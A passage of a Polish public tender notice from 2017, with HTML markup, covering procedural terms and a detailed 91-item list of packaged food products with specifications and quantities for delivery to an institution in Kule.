              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                nie
              <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 02/02/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Dostawy artykułów  spożywczych dla OSSW w Kulach <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1	Groch połówki	Op.jedn.400  500g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	kg	100
2	Orzechy włoskie łusk.	Op. jedn 100-200g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	kg	10
3	Fasola biała Jaś	Op jedn 400  500g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	kg	100
4	Rodzynki	Zdrowe, całe, nieuszkodzone, owalne, spłaszczone jagody o pomarszczonej powierzchni, średniej wielkości o brązowej barwie, właściwym zapachu charakterystycznym dla suszonych winogron bez zapachów obcych. Smak słodki, z charakterystycznym posmakiem, bez posmaków zgorzknienia. Masa netto 100-200g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. 	kg	15
5	Ogórek kiszony	Op jedn. Szklane 850- 900ml. Produkt otrzymany z ogórków gruntowych, kopru, korzeni chrzanu, ząbków czosnku zalanych wodą z solą, poddany kiszeniu. Konsystencja chrupiąca, twarda, bez sztucznych barwników i konserwantów. Cechy dyskwalifikujące: obce posmaki, zapachy, smak mocno słony, stęchły, nie dostateczna ocena organoleptyczna produktu, objawy zapleśnienia, psucia, nadmierna miękkość, obecność szkodników żywych, martwych oraz pozostałości.Masa netto nie mniej niż 870g, po odcieku nie mniej niż 450g. Skład: ogórki, naturalna zalewa, przyprawy. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	kg	300
6	Kapusta kiszona	Op jedn folia 900-1100g. Produkt otrzymany z poszatkowanej białej kapusty, poddanej kiszeniu poprzez zasolenie i fermentację o barwie białej do lekko kremowej. Konsystencja chrupiąca, twarda, bez sztucznych barwników i konserwantów. Cechy dyskwalifikujące: obce posmaki, zapachy, smak mocno słony, stęchły, nie dostateczna ocena organoleptyczna produktu, objawy zapleśnienia, psucia, nadmierna miękkość, obecność szkodników żywych, martwych, oraz ich pozostałości. Skład: kapusta, marchew, przyprawy. Po odcieku nie mniej niż 850g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	kg	500
7	Minikolby kukurydzy	Op jedn 300-400g, po odcieku nie mniej niż 200g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	kg	10
8	Przecier ogórkowy	Skład: ogórki kwaszone przetarte, przyprawy. Produkt pasteryzowany Op jedn 250-300ml, Masa netto nie mniej niż 210g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	kg	30
9	Szczaw konserwowy	Szczaw konserwowy pasteryzowany. Skład: liść szczawiu, przyprawy smakowe. Op jedn 250-300ml. Masa netto nie mniej niż  210g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	kg	30
10	Koncentrat buraczany	Koncentrat barszczu czerwonego . Skład: woda, zagęszczony sok z buraków ćwikłowych nie mniej niż 12%, cukier, sól, przyprawy. Produkt pasteryzowany. Op jedn 300 - 400ml. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	l	15
11	Seler konserwowy łagodny	Skład: seler, woda, ocet, cukier, sól. Op jedn 300-370 ml. Masa netto 320g, po odcieku nie mniej niż 160g.Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	kg	70
12	Pieczarki marynowane	Skład: pieczarki całe, cebula, marchew, woda, ocet, cukier, sól, przyprawy smakowe . Produkt pasteryzowany. Op  jedn 850-900g. Masa po odcieku 550g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	kg	10
13	Pieczarki krojone	Pieczarki krojone w zalewie słonej. Skład: pieczarki krojone, woda, sól, kwasek cytrynowy. Produkt pasteryz. Masa netto 800-900g. Masa po odcieku  nie mniej niż 550g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	kg	30
14	Papryka konserwowa	Produkt spożywczy otrzymany z papryki świeżej półsłodkiej, słodkiej, pozbawionej gniazd nasiennych i innych części niejadalnych w zalewie octowej z dodatkiem soli, cukru oraz roślinnych przypraw aromatyczno-smakowych i poddany procesowi pasteryzacji. Konsystencja  papryka jędrna, lekko miękka nierozpadająca się. Skład: Papryka słodka. Skład: papryka, ocet spirytusowy, woda, cukier, sól, mieszanka przypraw w tym gorczyca.  Masa netto nie mniej  niż 680g. Po odcieku nie mniej niż 310g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	kg	200
15	Chrzan tarty	Produkt spożywczy otrzymany ze świeżych, pozbawionych skórki tartych korzeni chrzanu. Skład: korzeń chrzanu nie mniej niż 50%, woda,  mleko w proszku, olej roślinny, ocet spirytusowy, cukier, sól,  Op jedn 150 - 200g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. 	kg	30
16	Pomidory krojone	Pomidory krojone. Skład: pomidory nie mniej niż  60%, sok pomidorowy nie mniej niż 39 %. Op. jedn. Puszka 2,5-3 kg. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	kg	20
17	Koncentrat pomidorowy	Koncentrat pomid.30%  wyprodukowany ze świeżych pomidorów, bez żadnych dodatków, bez konserwantów. Jednorodna przetarta masa. Niedopuszczalne objawy zapleśnienia i sfermentowania Za równoważny uważa się koncentrat gęsty nie zmieniający swojej barwy i smaku . Op jedn 180-250g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	kg	200
18	Groszek konserwowy	Produkt spożywczy  zielone jędrne, nierozpadające się ziarna sporządzone tylko z młodych świeżych strąków groszku w klarownej zalewie, utrwalony przez sterylizację. Skład: woda, groch suchy, sól. Op jedn 400  410 g.Po odcieku nie mniej niż 200g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	kg	100
19	Fasola konserwowa czerwona	Skład: fasola czerwona  ziarno, woda, sól, op. jedn. 400-500g. Po odcieku nie mniej niż 200g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	kg	30
20	Kukurydza konserwowa	Produkt spożywczy- soczyste nasiona kukurydzy uzyskane z wysokiej jakości surowców w klarownej zalewie. Skład: kukurydza  ziarno, woda, cukier, sól. Op jedn. 400-500g, po odcieku nie mniej niż 220g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	kg	120
21	Ogórek konserwowy	Ogórki konserwowe całe. Kl. I. Produkt spożywczy otrzymany ze świeżych ogórków, przypraw aromatyczno-smakowych, zalanych zalewą octową z dodatkiem soli i cukru, utrwalony przez pasteryzację w opakowaniu szklanym hermetycznie zamkniętym. Struktura: jędrne, chrupkie, powierzchnia ogórków wolna od uszkodzeń mechanicznych i plam chorobowych, na przekroju poprzecznym widoczne słabo wykształcone nasiona, ogórki powinny być proste w kształcie foremnym w zbliżonym do walca o smaku i zapachu charakterystycznym dla ogórków konserwowych słodko  kwaśnych z wyczuwalnym smakiem i aromatem przypraw. Skład: ogórki, woda, ocet spirytusowy,  cukier, sól, przyprawy aromatyczno  smakowe. Op. jedn 850-900ml. Masa netto nie mniej niż 870g, po odcieku nie mniej niż 450g. Termin przydatności do spożycia powininen wynosić minimum 180 dni od daty dostawy. 	kg	300
22	Żurawina do mięsa	Żurawina do mięs i serów niskosłodzona. Skład: owoce żurawiny, cukier, substancja żelująca. Łączna zawartość cukru nie mniej niż 44g cukru na 100g produktu. Op jedn 250-300g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	kg	7
23	Dżem niskosłodzony	Dżem o różnych smakach, z kawałkami owoców, Skład: owoce, cukier, substancja żelująca. Łączna zawartość cukru: nie mniej niż 36g na 100g produktu. Dżem nie może być konserwowany chemicznie. Op jedn 250-400g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. 	kg	40
24	Dżem wysokosłodzony	Op. jedn. 25 g Skład: cukier, syrop glukozowy, owoce, substancja zagęszczająca,  Otrzymane z 35g owoców na 100g wyrobu gotowego. Łączna zawartość cukru nie mniej niż 63g na 100g wyrobu gotowego. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. 	kg	150
25	Ananas w syropie	Ananas plastry w lekkim syropie. Skład: ananas, woda, cukier. Op jedn. 550-600g. Zawart.po odcieku nie mniej niż 340g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	kg	40
26	Brzoskwinie w syropie	Brzoskwinie w lekkim syropie. Skład: brzoskwinie, woda, syrop glukozowo- fruktozowy, cukier, . Op. jedn 800-900g , po odcieku nie mniej niż 470g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. 	kg	40
27	Śliwki suszone kalifornijskie	Śliwki suszone bez pestek półsuche konserwowane kwasem sorbowym. Op jedn 150  500g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. 	kg	20
28	Olej roślinny popularny	Olej słonecznikowy zastosowania: do smażenia, pieczenia, sosów, sałatek, surówek. Skład: Mieszanka słoneczników olejów słonecznik: słonecznikowy oraz sojowego i/lub słonecznikowego. Op.jedn 0,9  1 l. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	l	400
29	Oliwa z oliwek	Op.jedn 05  1 l. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. 	l	5
30	Mąka pszenna	Mąka Typ 500. Gluten nie mniej niż 27 % Op jedn 1 kg. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. 	kg	350
31	Kasza jęczmienna	Kasza jęczmienna średnia - kasza otrzymana z ziarna jęczmienia szklistego, o cienkiej łusce, przeznaczonego do celów konsumpcyjnych. Barwa kaszy jasnoszara z odcieniem od zielonkawego do żółtawego. Smak po ugotowaniu - swoisty. Niedopuszczalny smak gorzki i inny nieswoisty. Op. jedn 1 kg. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. 	kg	150
32	Kasza manna	Barwa biała z odcieniem żółtym. Zapach swoisty. Op jedn. 1 kg. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. 	kg	50
33	Kasza gryczana	Nasiona gryki. Surowiec krajowy. Op jedn 400  1000g . Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. 	kg	50
34	Płatki  musli	Płatki zbożowe połączone z dużymi kawałkami owoców, nie zawierające sztucznych konserwantów i barwników. Op. jedn. 250-300g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	kg	5
35	Płatki czekoladowe	Zbożowe muszelki o smaku czekoladowym. Skład: mąka pszenna nie mniej niż 60 %, cukier, glukoza, kakao,  tłuszcz palmowy. Op. Jedn. 250-300g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	kg	25
36	Płatki kukurydziane	Płatki kukurydziane - produkt otrzymany z łamanych ziarn kukurydzy, kaszki kukurydzianej z dodatkiem cukru, soli, ekstraktu słodowego w postaci suchych płatków.  Op jedn 250-300g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. 	kg	25
37	Płatki z miodem	Pierścionki miodowe. Skład: mąka owsiana, mąka kukurydziana, mąka pszenna, skrobia kukurydziana, cukier, sól, mleko w proszku, miód. Op. Jedn 250-300g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. 	kg	25
38	Ryż biały	Ryż długoziarnisty biały, z którego usunięto łuskę. Ziarno ryżu powinno być zdrowe i czyste oraz wolne od toksycznych i innych szkodliwych substancji. Op. Jedn 1 kg. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. 	kg	250
39	Mąka ziemniaczana	Skrobia ziemniaczana. Op jedn 1 kg. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. 	kg	80
40	Kwasek cytrynowy	Kwasek cytrynowy spożywczy. Kryształy sypkie, bez zlepów i grudek. Kryształy bezbarwne bez obcego zapachu. Smak kwaśny Op.jedn do 50- 100g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. 	kg	3
41	Bułka tarta	Bułka tarta o barwie jasnej, sypka, bez grudek, powstała ze starcia bułki pszennej wraz ze skórką, nadająca się do   panierek, bez skłonności do przypalania się. Zapach swoisty bez obcych zapachów. Smak charakterystyczny dla suszonego pieczywa pszennego, bez obcych posmaków. Op. jedn. 400- 500g . Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. 	kg	200
42	Groszek ptysiowy  	Op jedn 0,5-1 kg. Składniki: mąka pszenna, tłuszcz roślinny, sól, jaja w proszku, mleko odtłuszczone. w proszku, drożdże. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. 	kg	15
43	Paluszki solone	Paluszki solone w op.50-100g; Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. 	szt	40
44	Grzanki	Op jedn. 0,5-1kg. Grzanki ziołowo-czosnkowe. Składniki: chleb pszenny ( mąka pszenna, tłuszcz roślinny,sól, drożdże), tłuszcz roślinny, aromaty. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. 	kg	15
45	Cukier	Cukier biały - produkt otrzymany z buraków cukrowych, przeznaczony do spożycia. Kryształy sypkie, bez zlepów i grudek. Barwa biała, smak słodki, charakterystyczny dla cukru bez obcego zapachu. Op jedn. 1 kg. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. 	kg	1000
46	Miód	Miód pszczeli nektarowy wielokwiatowy NK. Op.jedn.25g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. 	kg	150
47	Napój kakaowy	Kakao rozpuszczalne o mocno czekoladowym smaku z witaminami i składnikami mineralnymi. Op.jedn.200-400g.. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. 	kg	10
48	Czekolada mleczna	Op.jedn 100g. Skład: miazga kakaowa, cukier, tłuszcz kakaowy, masa kakaowa nie mniej niż 30%, masa mleczna nie mniej niż 15 % mleko w proszku pełne, mleko w proszku odtłuszczone, serwatka w proszku, tłuszcz roślinny. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. 	szt	1500
49	Czekolada do fontann	Czekolada mleczna. Masa kakaowa nie mniej niż 37 % cukier, tłuszcz kakaowy, mleko pełne w proszku, miazga kakaowe, emulgator: lecytyna sojowa, aromat Nat. wanilia. Op. jedn do 2,5 kg.. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. 	kg	2
50	Krem o smaku czekoladowym	Krem o smaku czekoladowym z kawałkami orzechów. Skład: cukier, olej roślinny, orzechy laskowe nie mniej niż 13%, odtłuszczone słone 7,4%, odtłuszczone mleko w proszku . Op jedn. 200-250g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. 	kg	100
51	Wafelek w czekoladzie	Wafelek w czekoladzie w op.20-25g; Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. 	szt	2500
52	Makaron gruby	Makaron  jajeczny ( kolanka, łazanki, świderki, muszelki, rurki). Produkow. z świeżych jaj i  najwyższej jakości mąki. Makaron odpowiednio twardy i doskonale sprężysty, a dzięki odpowiedniemu procesowi suszenia nie skleja się  i zachowuje naturalny zapach, złocisty kolor . Op jedn 250-500g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. 	kg	200
53	Makaron nitki	Makaron  jajeczny nitki. Skład: mąka pszenna, świeże jaja, woda, . Zawartość tłuszczu nie mniej niż 1,5 %.Op. jedn 250-500g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. 	kg	40
54	Zacierki	Makaron jajeczny zacierka. Skład: mąka pszenna, woda, jaja  nie mniej niż 9% . Op. jedn 250 -500g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. 	kg	20
55	Makaron ryżowy	Makaron w kształcie ryżu. Skład: Mąka makaronowa pszenna, jajka, woda.Op.250-500g. Termin przydatności do spożycia powinien wynsić minimum 180 dni od daty dostawy. 	kg	30
56	Makaron lasagne	Płatki makaronu Lasagne nie wymagające gotowania. Op. jedn 250g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	kg	40
57	Kawa rozpuszczalna	Kawa rozpuszczalna naturalna 100%, aglomerowana. Op jedn 100g, 50g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. 	kg	15
58	Kawa naturalna	Kawa naturalna 100% pakowana próżniowo, mielona. Op. jedn. 250g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. 	kg	5
59	Herbata expresowa	Herbata  expresowa  torebki w kopertkach i ze sznureczkiem. Op. Podst.2g Op. Zbiorcze 50g, 100g, 200g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. 	kg	65
60	Liść laurowy	Liśc laurowy suszony. Op.jedn.5-10g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. 	kg	1
61	Majeranek	Przyprawa ziołowa. Mieszanina liści i kwiatów o intensywnym, charakterystycznym zapachu i smaku. Op.jedn.7-10g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. 	kg	3
62	Papryka mielona słodka	Przyprawa ziołowa. Barwa czerwona. Smak słodkawy, mało wyczuwalny, lekko piekący. Op. jedn 20 - 100g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. 	kg	3
63	Ziele angielskie	Ziele angielskie - przyprawa ziołowa. Op.jedn 10- 15g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. 	kg	2
64	Tymianek	Op. jedn.10-30g. Wysuszone ziele tymianku pospolitego. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. 	kg	1
65	Ocet spirytus. 10%	Op. jedn 0,450- 0,5 l. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. 	l	50
66	Ocet winny 	Ocet winny z białego wina o kwasowości nie mniej niż  5%.Op jedn. Butelka 200-750ml. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. 	l	3
67	Ketchup	Ketchup o smaku łagodnym. Op. jedn. 400-500g. Skład: koncentrat pomidorowy  nie mniej niż 35%, woda, cukier, ocet, skrobia.  Sól. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	kg	200
68	Musztarda delikatesowa stołowa	Op.jedn.170-500g. Masa netto  nie mniej niż 175 g. Skład: woda, gorczyca, ocet, sól. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. 	kg	130
69	Przyprawa do potraw typu "Wegeta"	Przyprawa warzywna do zup potraw mięsnych i ryb. Skład: zawartość soli nie więcej niż55%, warzywa suszone nie mniej niż15%, marchew, cebula, pasternak, seler, natka pietruszki, por, substancje wzmacniające smak i zapach.; cukier pieprz czarny, ekstrakt drożdżowy.  Op.jedn 150 - 200g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. 	kg	40
70	Delikata do ryb	Op jedn 0,5-1kg. Składniki: sól, cebula suszona 18%, substancja wzmacniająca smak i zapach: glutaminian sodu; pieprz, natka pietruszki, koper, mąka pszenna, regulator kwasowości: kwas cytrynowy, czosnek 2,3%, olej roślinny, tymianek, imbir. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. 	kg	3
71	Delikata do mięs	Op jedn 0,4 - 0,5kg. Składniki: substancja wzmacniająca smak i zapach: glutaminian sodu, sól, mąka pszenna, papryka mielona, czosnek, natka pietruszki, rozmaryn, pieprz, oregano, tymianek, majeranek, papryka ostra, cebula suszona, cukier, pomidory suszone, olej roślinny, barwniki: karmel amoniakalny,, ekstrakt z papryki, aromat, substancja przeciwzbrylająca: dwutlenek krzemu. Przyprawa bez konserwntów. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. 	kg	7
72	Przyprawa do mięsa	Przyprawa do mięs i innych potraw. Składniki: substancja wzmacniająca smak i zapach: glutaminian sodu; sól, mąka pszenna, papryka mielona, czosnek, natka pietruszki, rozmaryn, pieprz, oregano, tymianek, majeranek, papryka ostra, cebula suszona, cukier, pomidory suszone, olej roślinny, barwniki, aromat, substancja przeciwzbrylająca. Op.jedn.30- 100g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. 	kg	10
73	Przypr. do ryb	Op. jedn 20-30g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. 	kg	3
74	Przyprawa do zup w płynie uniwersalna	Skład: hydrolizat białkowy, glutaminian, sól, woda, przyprawy smakowe. Op.jedn 1 kg. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. 	kg	70
75	Przyprawa do potraw poddawanych obróbce term. Typu "Jarzynka"	Przyprawa do potraw poddawanych obróbce termicznej - przyprawa do mięs o zawartości soli nie więcej niż 40%, op. jedn 150g, 250g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	kg	40
76	Przyprawa do kurczaka	Przyprawa do kurczaka. Mieszanka przypraw ziołowych i korzennych. Skład: curry, papryka słodka, chili, czosnek, imbir, pieprz czarny, sól. Barwa niejednolita, charakterystyczna dla użytych składników. Smak swoisty bez posmaków obcych. Op. jedn 30-40g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. 	kg	10
77	Przyprawa gyros	Przyprawa kebab-gyros. Kompozycja wielu przypraw. Skład mieszanki: sól, czosnek, papryka słodka, wzmacniacz smaku(glutaminian sodu), papryka ostra, cebula, cząber, rozmaryn, tymianek, kolendra, curry, gałka muszkatalowa, ziele angielskie, oregano, bazylia, majeranek. Op.jedn 20-40g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	kg	1
78	Przyprawa curry	Kompozycja ziół, przypraw i suszonych warzyw o charakterystycznym, pikantnym aromacie i smaku. Op.jedn 20-40g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. 	kg	1
79	Czosnek granulowany	Przyprawa o charakteryst. smaku i aromacie do tłust. mięs, zup i sosów. Op.jedn 20-40g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	kg	2
80	Przyprawa do potraw  typu "Kucharek"	Przyprawa warzywna do potraw poddawanych obróbce termicznej  Składniki: zawartość soli nie więcej niż 40 %, suszone warzywa nie mniej niż15%(marchew, pasternak, cebula, seler, natka pietruszki), substancje wzmacniające smak i zapach. Op.jedn.150-200g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	kg	40
81	Majonez dekoracyjny	Majonez dekoracyjny. Składniki: olej roślinny, żółtko jaja nie mniej niż 6,0%, ocet, musztarda (woda, gorcz. ocet, sól, cukier).Op. jedn. 400-500ml. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	l	250
82	Gałka muszkatołowa	Gałka muszkat. mielona. Op  jedn 10 - 20g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	kg	1
83	Cynamon	Cynamon mielony. Barwa jasnobrązowa do brunatnej, jednolita. Zapach swoisty, intensywny, bez zapachów obcych. Smak słodko- piekący, bez posmaków obcych. Przyprawa o silnym balsamicznym zapachu oraz ostrym, korzennym, gorzkawym i zarazem słodkim smaku. Op jedn 15-20g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	kg	1
84	Pieprz czarny	Pieprz czarny mielony, naturalny. Przyprawa o charakterystycznym ostrym smaku, stosowana do wszelkiego rodzaju potraw mięsnych i rybnych, zup, bulionów, sosów, warzyw oraz sałatek i marynat. Op.jedn 5-25g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	kg	12
85	Zioła prowansalskie	Skład: bazylia, majeranek,rozmaryn, szałwia, czomber, oregano, tymianek, mięta. Op.jedn 10-30g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	kg	1
86	Sól jodowana	Sól warzona, próżniowa, jodowana do celów spożywcza. Składniki: chlorek sodu (NaCl) min. 99,0 %. Substancja przeciwzbryl. E 536 do 1 mg/100g, Jodan potasu 3,91,3 mg/100g. Op jedn. 1 kg. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	kg	140
87	Sól czosnkowa	Sól czosnkowa jodowana. Skład: sól jodowana (zawartość jodku potasu 30  10 mg/kg soli), czosnek  30%. Op.jedn 20-40g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	kg	3
88	Żelatyna spożywcza	Żelatyna spożywcza. Op jedn 30 -50g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	kg	8
89	Żurek w płynie	Op. jedn. butelka 450-500 ml. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	l	150
90	Pasztet drobiowy	Op jedn 100-135g. Pasztet z drobiu w foremce aluminiowej zamkniętej platynką, poddany procesowi sterylizacji. (wyklucza się puszki i słoiki).Skład: mięso drobiowe, skórki z kurcząt , wątroba z kurcząt , mąka pszenna, sól, woda, przyprawy, skrobia ziemniaczana, białko sojowe, błonnik pszenny. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	kg	150
91	Konserwa mięsna typu "Turystyczna"	Op jedn 100-135g. Konserwa mięsna w foremce aluminiowej zamknięta platynką poddana procesowi sterylizacji ( wyklucza się puszki i słoiki). Skład: Mięso wieprzowe minimum 50%, mięso drobiowe minimum 10%, woda, skrobia ziemniaczana, sól, przyprawy. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	kg	150


 <br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15800000-6, 03212213-6,
                    03220000-9,
                    03221210-1,
                    03222115-2,
                    15331000-7,
                    15331110-1,
                    15331135-2,
                    15331136-9,
                    15331400-1,
                    15331423-8,
                    15331425-2,
                    15331462-3,
                    15331464-7,
                    15331470-2,
                    15331500-2,
                    15332200-6,
                    15332290-3,
                    15332400-8,
                    15332410-1,
                    15411100-3,
                    15411110-6,
                    15612100-2,
                    15613000-8,
                    15613300-1,
                    15613311-1,
